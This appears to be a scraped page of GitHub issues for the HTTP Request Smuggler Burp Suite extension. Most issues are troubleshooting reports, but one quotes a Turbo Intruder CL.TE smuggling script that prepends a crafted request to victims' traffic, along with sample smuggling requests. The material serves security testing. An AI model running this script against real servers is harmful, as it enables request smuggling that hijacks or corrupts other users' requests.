When I launch HTTP request smuggling plugin, I can see in logger++ that the Transfer-Encoding header is added after the Content-Length. I can see these two requests:

...
Content-Length: 11
 Transfer-Encoding: chunked

1
Z
Q

And this one

Content-Length: 5
 Transfer-Encoding: chunked

1
Z
Q

So in my case, the server response well and the plugin didn't find anything. So I was wondering why this difference and if it's possible to force these check using this plugin.

Thanks a lot for your work and for everything you do for the community.

Your work is impressive and awesome !

can not find "Smuggle attack" button in right-click menu on request

Burp suite version is V2.1.03

Fristly i clicked ‘Launch sumllge probe’, and waited for the probe completed， but i can not find 'Smuggle attack' button in menu on request.

Compilation error

$ md5sum turbo-intruder-all.jar 
10d7607c5621ce021c2ed7b6de9560d5  turbo-intruder-all.jar

> Task :compileJava FAILED
/tmp/http-request-smuggler/src/burp/SuggestAttack.java:19: error: cannot find symbol
            String headers = Utils.getHeaders(request);
                                  ^
  symbol:   method getHeaders(String)
  location: class Utils
/tmp/http-request-smuggler/src/burp/SuggestAttack.java:73: error: constructor TurboIntruderFrame in class TurboIntruderFrame cannot be applied to given types;
        new TurboIntruderFrame(message, new int[]{}, script, Utilities.helpers.stringToBytes(request)).actionPerformed(e);
        ^
  required: IHttpRequestResponse,int[]
  found: IHttpRequestResponse,int[],String,byte[]
  reason: actual and formal argument lists differ in length
2 errors

I've also tried:

$ md5sum turbo-intruder-all.jar 
b051b96ebf3027c6b1c36d34da4e8c67  turbo-intruder-all.jar

If this is a version incompatibility, can you please document the version required?

Ideally this dep. would be on Maven central - or in your own Maven-compatible artifact repository - and included in the dependencies section of the build.gradle file rather than as you've currently set it up.

Menu is too big.

The "HTTP Smuggle Probe"menu is too big,I cant even select the "ok" button.

how stop? how see details request and response?

Attack menu doesn't show up for certain techniques

For some attack techniques the menu Smuggle attack CL.TE or Smuggle attack TE.CL does not show up when i do right click . for instance i noticed that it's not working for this scenario:
TrAnSfer-EnCOding: cHuNkeD
I believe this is due to the check done in the class SuggestAttack.java on line 28

if (headers.contains("chunked") || headers.contains("Transfer-Encoding")) {
...
}

So for any test that doesn't contain atleast one of those words the attack menu won't show up. Maybe add lower case before the check

Attacks not launched in Windows 10, only queued

After Launched Smuggle Probe....nothing happens

This might be a big newbie question...but:
System: OSX Catalina and Burp Suite Community.
-I click on the Target-tab and right-click on a www.*****.com-address which was spidered Passive.
-RIght-click on the GET-request and "Launch Smuggle Probe"

Go to Extender-->Extensions-->Output tab--> UI:
Nothing shows up. It just says (sometimes) 1 attack in queue. Where can I see the results?

I know how the HTTP Smuggling works in practice. I have been doing it manually, but when I saw this add-on I would like to try it.

Couldn't find http-request-smuggler-all.jar

Im trying to install http-request-smuggler manually. But I cant find any other jar file except turbo-intruder jar file in the folder. I believe i need http-request-smuggler jar file to complete the installation. Help.

ProOnly is false here, and true in the BApp store

So which is correct?

Click Http Request Smuggler Unable to load to Turb Inturder. Burpsuite 2022.2.2

Hello,

Click Http Request Smuggler Unable to load to Turb Inturder. Burpsuite 2022.2.2

Forbidden newlines in headers are not allowed

Due to default Fooz:bar header issued when probing by http smuggler in burp suite, the server returns a 403 error saying "Forbidden: Newlines in headers are not allowed". But when I manually remove the Fooz:bar header line in repeater I get the response correctly. Is there a workaround that this directly work on the tool?

Error running Smuggle Probe on Web-Security-Academy

Updated Burp to 2021.8 today on MacOS and installed HTTP Request Smuggler from the BApp store.
Logged in to the Academy and started the CL.TE lab.
Located request in Proxy History, right-clicked, selected Extensions|HTTP Request Smuggler|Smuggle probe.
On the Output pane for the extension, I am getting the following:

Using albinowaxUtils v0.4
Loaded HTTP Request Smuggler v2.0
Updating active thread pool size to 8
Loop 0
Queued 1 attacks from 1 requests in 0 seconds
TImeout with response. Start time: 1628558700578 Current time: 1628558711713 Difference: 11135 Tolerance: 10000
Unexpected report with response
Error in thread: Cannot invoke "String.length()" because "decoded" is null. See error pane for stack trace.

And in the error pane, I get

java.lang.NullPointerException: Cannot invoke "String.length()" because "decoded" is null
	at burp.ConfigurableSettings.getString(ConfigurableSettings.java:177)
	at burp.ChunkContentScan.sendPoc(ChunkContentScan.java:132)
	at burp.ChunkContentScan.doConfiguredScan(ChunkContentScan.java:76)
	at burp.SmuggleScanBox.doScan(SmuggleScanBox.java:111)
	at burp.Scan.doScan(BulkScan.java:552)
	at burp.BulkScanItem.run(BulkScan.java:472)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
	at java.base/java.lang.Thread.run(Thread.java:832)

FWIW, I originally was attempting on the lab description page, not the lab itself, and I was not getting any errors (maybe because it isn't vulnerable, but ¯\_(ツ)_/¯).

Edit: I hadn't checked earlier; it did show the vulnerability in the Dashboard, but I was waiting for the extension output to show completed and I never got that message.

Could anyone tell me how to use this tool??

I could'nt understand every options mean of atack config,and how to exploit it efficiently......Could anyone teach me a little bit? Thanks.

Burp not logging packets while performing HTTP request smuggle probe.

I’ve been trying to exploit and track down an apparent HTTP smuggling issue in a site I’m testing which is causing me lots of grief.

I start by spinning up a collaborator client and copying a payload.

I then go to the target tab, select my target domain and enter the collaborator domain in the poc-collab domain field and select all ‘poc’ options.

I then click ok which launches the scan.
Using the Logger++ extension I can watch the requests and responses being sent.
I also launch Wireshark and capture my Ethernet interface at the same time.
The traffic generated by Burp and displayed in both logger++ (and project options -> misc -> logging output) looks something like this:

All requests are only slight differences between the Content Length and Transfer Encoding headers. No actual payload information (for example, containing collaborator payloads or the 'smuggled' requests) is presented. Only a handful of characters.

This is in stark contrast to what Wireshark sees as a raw packet on the wire:

(fun fact, Wireshark also struggles to handle malformed CL/TE information)

But once the output is cleaned up from Wireshark, the REAL request is shown as below:

This packet isn’t logged anywhere that I can find. And, more concerning is that the finding isn’t noted anywhere, even though collaborator pingbacks are regularly occurring.

Currently there is no way for me to easily reproduce the results generating the collaborator payloads as I can’t identify the original requests that generated them without manually digging through all the Wireshark packets and testing different smuggler payloads.

I’m not sure why this appears to be an issue as I have issues raised in the target tab for other hosts with similar requests as shown here:

But none raised for the specific host I’m testing currently.

Any help you could provide would be greatly appreciated.
Thanks!

strange issue the trying to run the plugin

Burp community edition, v 2.1.04
Installed the extension and see no errors in extensions panel, the option to launch
smuggle probe is shown in the menu then selecting an host in the proxy menu,
attack config is shown and hen I click OK , no error, no output pane is shown.

Looking at output in the extension menu for this plugin I see:
thread pool size: 8
timeout: 10
use key: true
key method: true
key status: true
key content-type: true
key server: true
key header names: false
skip vulnerable hosts: false
skip obsolete permutations: false
only report exploitable: false
risky mode: false
Loaded HTTP Request Smuggler v1.03
Queued 1 attacks
Queued 1 attacks
Completed 1 of 1
Completed 2 of 2

and for turbo Intruder:
Loaded Turbo Intruder v1.0.14

Can not figure out if I miss something in the setup or if there is a issue, as by looking it looks like the attack is performed but the result is not showing

Smuggle probe running even though task execution paused

Hi,

I’ve ‘globally’ paused task extensions as well as all the blow audits/crawls as shown below. However, using the extension logger++ the smuggle probe extension is clearly generating new traffic regardless at the same rate as before.

Logger++ reports the source of the traffic as ‘extender’.

All tasks paused

Pause happened at request 26. Note that it continues (and will persist)

Unloading the extension stops the smuggle probe task, but it can not be resumed and instead must start again.

The config I used was as shown below, however, it does not appear to matter which options are used:

If there is some way to pause the execution of the smuggle probe that would be possible to resume, that would be most welcome.

In a similar vein, being able to see that the smuggle probe is running, and specifically, what host it is running against would be a most welcome additional feature.

Thanks,

Smuggle Probe Fails To Detect the Vulnerability on Basic Web Academy Lab

I have Burp Suite Professional Version 2022.5.2 on Mac OS.

I attempted to test the HTTP Request Smuggler Probe on the PortSwigger Web Academy Request Smuggler Lab 1: HTTP request smuggling, basic CL.TE vulnerability but the extension failed to detect it. I tried unloading all my extensions and it still didn't work.

Attached the request logs.

smuggler_logs.csv

Prefix not showing in Turbo Intruder

If Burp Pro detects HTTP Smuggle Vulnerability you can launch a Smuggle Attack (CL.TE) or (TE.CL) launching Smuggle attack from Turbo Intruder should lead you to this Configuration.

# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import re

def queueRequests(target, wordlists):

    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''POST /hopefully404 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1'''

    chunk_size = hex(len(prefix)).lstrip("0x")
    attack = target.req.replace('0\r\n\r\nX', chunk_size+'\r\n'+prefix+'\r\n0\r\n\r\n')
    content_length = re.search('Content-Length: ([\d]+)', attack).group(1)
    attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3))
    engine.queue(attack)

    for i in range(14):
        engine.queue(target.req)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)

Vulnerable Request:

POST / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

X

Screenshot:

In Result, I cannot see the payload or the prefix in my request in turbo intruder requests. It just like repeating the request without the payloads. I don't know if there is something wrong in my end or in my configuration. let me hear it from @albinowax

Failure to detect and report issue

Tested on multiple targets:
The following response is received after about 50 seconds, the extension failed to report the issues
The targets were tested manually and confirmed vulnerable

HTTP/1.1 504 GATEWAY_TIMEOUT
Content-Length: 0
Connection: Close

Recieveing Null Response Smuggler

Hi,

Burp extension and smuggler tool both indicated the http request smuggler (CL.TE) vulnerability, but when i test the vulnerability through turbo intruder i got null response.

Is there any mistake in payload? Even i have not received any 404 or redirection, just received a null.

Not detecting H2.CL

Hey guys, I used the req. smuggler probes to solve all the new labs, including the tunnel probes it was very helpful, but looks like its not working w/ HTTP/2 CL.

The main HTTP/2 probe always issues as HTTP/2 TE, also in the "LAB: H2.CL request smuggling".
The Tunnel probe CL only do 4 requests and stop, i've tried to use it in many cases and it didn't work.
The Tunnel probe TE works perfectly.

So I ended up solving the CL lab as TE as well, it confused me. Also noticed that almost of them has multiple solutions (CL and TE). I will not detail here because it will give spoiler to some ppl.

This is not a problem for this case, because its solvable as TE, but apparently it is really not detecting H2.CL in any way.

..btw, thank you for this amazing extension.

install fail due to "Failed to verify BApp file"

Either from Bapp store or from mannul, it would always fail because the error
.
When install from mannul, it would poll up an alert window ,as below:

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.

Jobs

Jooble